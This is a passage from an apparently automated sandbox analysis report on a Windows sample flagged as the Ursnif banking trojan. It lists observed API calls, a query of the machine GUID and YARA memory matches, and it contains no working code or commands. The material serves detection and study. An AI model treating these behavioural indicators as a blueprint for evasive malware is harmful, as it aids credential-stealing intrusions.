            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E1000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,1_2_6D8E1000
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_6D8E166F
            Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

            Remote Access Functionality: